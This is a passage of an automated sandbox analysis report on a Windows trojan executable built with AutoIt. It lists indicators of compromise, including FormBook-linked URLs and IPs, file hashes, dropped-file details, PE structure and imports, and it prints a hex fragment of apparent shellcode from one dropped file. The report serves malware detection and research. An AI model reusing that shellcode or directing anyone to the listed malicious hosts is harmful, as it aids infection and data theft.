                  • VT rate limit hit for: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:53:48API Interceptor15x Sleep call for process: RpcPing.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  74.208.236.230Financial Results April 21.pptx (9,753K).exeGet hashmaliciousFormBookBrowse
                  • www.bobacravings.com/tboh/?yrvHSPgX=MBqeKa5Q5XoIMPVQAhoeLQTRyEQKEekeopNHcmeA1CZ1keeV9aqQjzSCc2CMYppNA8qs&K8e4v=Ab8TRh10Irv0MPg
                  PO_210308.exeGet hashmaliciousFormBookBrowse
                  • www.theordinaryph.com/ntg/?9r=2dRdKtpX&uZCD=VPw6ieQm3u5hP3AVpthyzZxVSOwwRWALHmifNOQ+HiAyoOEWEcRl85tQofppZZZ+04fP

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  REPRISE-HOSTINGUS5NiE12PYJz.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.166
                  DleeCmz8nw.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.142
                  x86.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.112
                  mips.elfGet hashmaliciousUnknownBrowse
                  • 185.179.207.156
                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.128
                  QbQ0spd3GB.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.143
                  43ZYohKtbk.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.136
                  qrUvlKkf7N.elfGet hashmaliciousMiraiBrowse
                  • 185.179.207.110
                  arm5-20230705-0410.elfGet hashmaliciousMoobotBrowse
                  • 142.202.6.159
                  uwVvr9YXPn.elfGet hashmaliciousMiraiBrowse
                  • 142.202.6.152
                  ONEANDONE-ASBrauerstrasse48DEAttendance list.exeGet hashmaliciousFormBookBrowse
                  • 217.160.0.106
                  8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                  • 74.208.236.162
                  rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                  • 74.208.236.72
                  yaM8XR1HfL.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                  • 217.160.0.1
                  https://www.asarco.com/Get hashmaliciousUnknownBrowse
                  • 74.208.236.164
                  Att0027592.exeGet hashmaliciousFormBookBrowse
                  • 217.76.156.252
                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                  • 217.160.0.144
                  scan19062024.exeGet hashmaliciousFormBookBrowse
                  • 212.227.172.254
                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                  • 217.160.0.130
                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                  • 217.160.0.130
                  ONEANDONE-ASBrauerstrasse48DEAttendance list.exeGet hashmaliciousFormBookBrowse
                  • 217.160.0.106
                  8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                  • 74.208.236.162
                  rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                  • 74.208.236.72
                  yaM8XR1HfL.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                  • 217.160.0.1
                  https://www.asarco.com/Get hashmaliciousUnknownBrowse
                  • 74.208.236.164
                  Att0027592.exeGet hashmaliciousFormBookBrowse
                  • 217.76.156.252
                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                  • 217.160.0.144
                  scan19062024.exeGet hashmaliciousFormBookBrowse
                  • 212.227.172.254
                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                  • 217.160.0.130
                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                  • 217.160.0.130

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\45570IH2

                  Download File
                  Process:C:\Windows\SysWOW64\RpcPing.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                  Category:dropped
                  Size (bytes):196608
                  Entropy (8bit):1.1239949490932863
                  Encrypted:false
                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                  MD5:271D5F995996735B01672CF227C81C17
                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\Milburt

                  Download File
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.591385962456068
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IC6bd4vfF3if6gyud:miTZ+2QoioGRk6ZklputwjpjBkCiw2RR
                  MD5:0B24AF83EE786ECAF547FB81C80D6956
                  SHA1:5FAC82A415B09ED670020AA2377B6BCB5F3A6FFE
                  SHA-256:26E5B9A3CDE6F21B8BA6D01F2C979C93DE6D631E55AA4326C5469ABBCD2FC5A8
                  SHA-512:031BCFE8D0BD64B002CAD9ECF1F3536E7D4E525CDE85B52AEFECFE8D85B4E9B0366F1310D87915CC3F0BDDA4E1855BB6DC1CFEDD629BF102C21055A514CB5CFD
                  Malicious:false
                  Reputation:low
                  Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                  C:\Users\user\AppData\Local\Temp\aut9784.tmp

                  Download File
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.994375681954108
                  Encrypted:true
                  SSDEEP:6144:GA2wkwM+yGld/SPTJfn/TIHku0lyy7CDHgRaW88mr/4NgjCd:GA2K5y6dWn/TIHR2yy75aWZ9d
                  MD5:BCE6497EDCADD36058C985629D5C11A2
                  SHA1:FE5B7801680FBCA9697C46E5280B14F63BF5BAD3
                  SHA-256:295B6024FB753B1D72752099299D577436FB14AA208729186617B577AABB13EF
                  SHA-512:0D79D577BCB0433C26F271CC7AE93F017B1704C7FFF0C25C4C83B58500DB0F2510DDC702E29C2938096C8A675D969264477ED2E0A9F0D6DE3F6AC57DFACD9416
                  Malicious:false
                  Reputation:low
                  Preview:u.}..E08X.._...z.I;...`F8..MXV7ADOFLI8R8SHE08XIMXV7ADOFLI.R8SFZ.6X.D.w.@..g.!Q!.#:*WJ9$m;7Y/+;f.,. M=h,^....x;X%!aKAC.R8SHE08!HD.kW&.r&+..2_.R..b)*.L..s&+."...t%W.. .0kW&.OFLI8R8S..08.HLXdMA.OFLI8R8S.E29SHFXV{EDOFLI8R8S.P08XYMXVWEDOF.I8B8SHG08^IMXV7ADIFLI8R8SH%48XKMXV7ADMF..8R(SHU08XI]XV'ADOFLI(R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXxC$<;FLIL.<SHU08X.IXV'ADOFLI8R8SHE08xIM8V7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI

                  C:\Users\user\AppData\Local\Temp\aut97B4.tmp

                  Download File
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9856
                  Entropy (8bit):7.5984942475612405
                  Encrypted:false
                  SSDEEP:192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvo3pFq7S4DxJOy+28x9BkUc2:I6qxwzMZy3QU9Obysvo5eS4DxJOy+lkI
                  MD5:71E5CC180BE1E5265605F07EE74DA1B8
                  SHA1:2F8B2485D4AA2F77A7E76295780F1DA702FC9189
                  SHA-256:A5392C360A8C1C7D1AEA6E50DBA426C619DAC8A7E1503A1BF7582E2113C0B49C
                  SHA-512:5D834CDB0A11BCD81BA1687132C0DAC995FDAFF463BF5D3A398052169ADBD2F2C3FC41645D2936CF3C254B5B52A28F324EA10B52050F58704176FCAC97CCBBA6
                  Malicious:false
                  Reputation:low
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                  C:\Users\user\AppData\Local\Temp\carryover

                  Download File
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.994375681954108
                  Encrypted:true
                  SSDEEP:6144:GA2wkwM+yGld/SPTJfn/TIHku0lyy7CDHgRaW88mr/4NgjCd:GA2K5y6dWn/TIHR2yy75aWZ9d
                  MD5:BCE6497EDCADD36058C985629D5C11A2
                  SHA1:FE5B7801680FBCA9697C46E5280B14F63BF5BAD3
                  SHA-256:295B6024FB753B1D72752099299D577436FB14AA208729186617B577AABB13EF
                  SHA-512:0D79D577BCB0433C26F271CC7AE93F017B1704C7FFF0C25C4C83B58500DB0F2510DDC702E29C2938096C8A675D969264477ED2E0A9F0D6DE3F6AC57DFACD9416
                  Malicious:false
                  Reputation:low
                  Preview:u.}..E08X.._...z.I;...`F8..MXV7ADOFLI8R8SHE08XIMXV7ADOFLI.R8SFZ.6X.D.w.@..g.!Q!.#:*WJ9$m;7Y/+;f.,. M=h,^....x;X%!aKAC.R8SHE08!HD.kW&.r&+..2_.R..b)*.L..s&+."...t%W.. .0kW&.OFLI8R8S..08.HLXdMA.OFLI8R8S.E29SHFXV{EDOFLI8R8S.P08XYMXVWEDOF.I8B8SHG08^IMXV7ADIFLI8R8SH%48XKMXV7ADMF..8R(SHU08XI]XV'ADOFLI(R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXxC$<;FLIL.<SHU08X.IXV'ADOFLI8R8SHE08xIM8V7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.1628969378768605
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File size:1'208'832 bytes
                  MD5:a6d5020bf8bfe2dc1140a50936ef5ec9
                  SHA1:284d6d281a186da8c7bfa0ee5ce310be41be800b
                  SHA256:ac162f990dd540c5b295e5c8dfccc04374519feaa70ed0439292f70761a034cd
                  SHA512:830b92f223da57ae997219e5ba8d4719dfe729639686facbd398c883567652e96a8636141e9da169228360c218107aed80f1eff23bf52f418765951f8cfa0e2b
                  SSDEEP:24576:PAHnh+eWsN3skA4RV1Hom2KXMmHaPR5sVmkNr9QkGTBuIEsY5:yh+ZkldoPK8YaPHsZvQpjET
                  TLSH:E545BE0273D2C032FFAB92739B6AF60156BD79254123852F13981DB9BD701B2267E763
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                  File Icon

                  Icon Hash:aaf3e3e3938382a0

                  Static PE Info

                  General

                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6683C083 [Tue Jul 2 08:55:31 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                  Entrypoint Preview

                  Instruction
                  call 00007F68587FA17Dh
                  jmp 00007F68587ECF34h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F68587ED0BAh
                  cmp edi, eax
                  jc 00007F68587ED41Eh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007F68587ED0B9h
                  rep movsb
                  jmp 00007F68587ED3CCh
                  cmp ecx, 00000080h
                  jc 00007F68587ED284h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F68587ED0C0h
                  bt dword ptr [004BF324h], 01h
                  jc 00007F68587ED590h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007F68587ED25Dh
                  test edi, 00000003h
                  jne 00007F68587ED26Eh
                  test esi, 00000003h
                  jne 00007F68587ED24Dh
                  bt edi, 02h
                  jnc 00007F68587ED0BFh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F68587ED0C3h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F68587ED115h
                  bt esi, 03h

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5cafc.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x7134.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc80000x5cafc0x5cc00b6e9031fdf82786b232a3e43e19b45eaFalse0.9290899806266847data7.896807472814627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1250000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                  RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                  RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                  RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                  RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                  RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                  RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                  RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                  RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                  RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xd07b80x53dc2data1.0003231535124748
                  RT_GROUP_ICON0x12457c0x76dataEnglishGreat Britain0.6610169491525424
                  RT_GROUP_ICON0x1245f40x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x1246080x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x12461c0x14dataEnglishGreat Britain1.25
                  RT_VERSION0x1246300xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x12470c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, 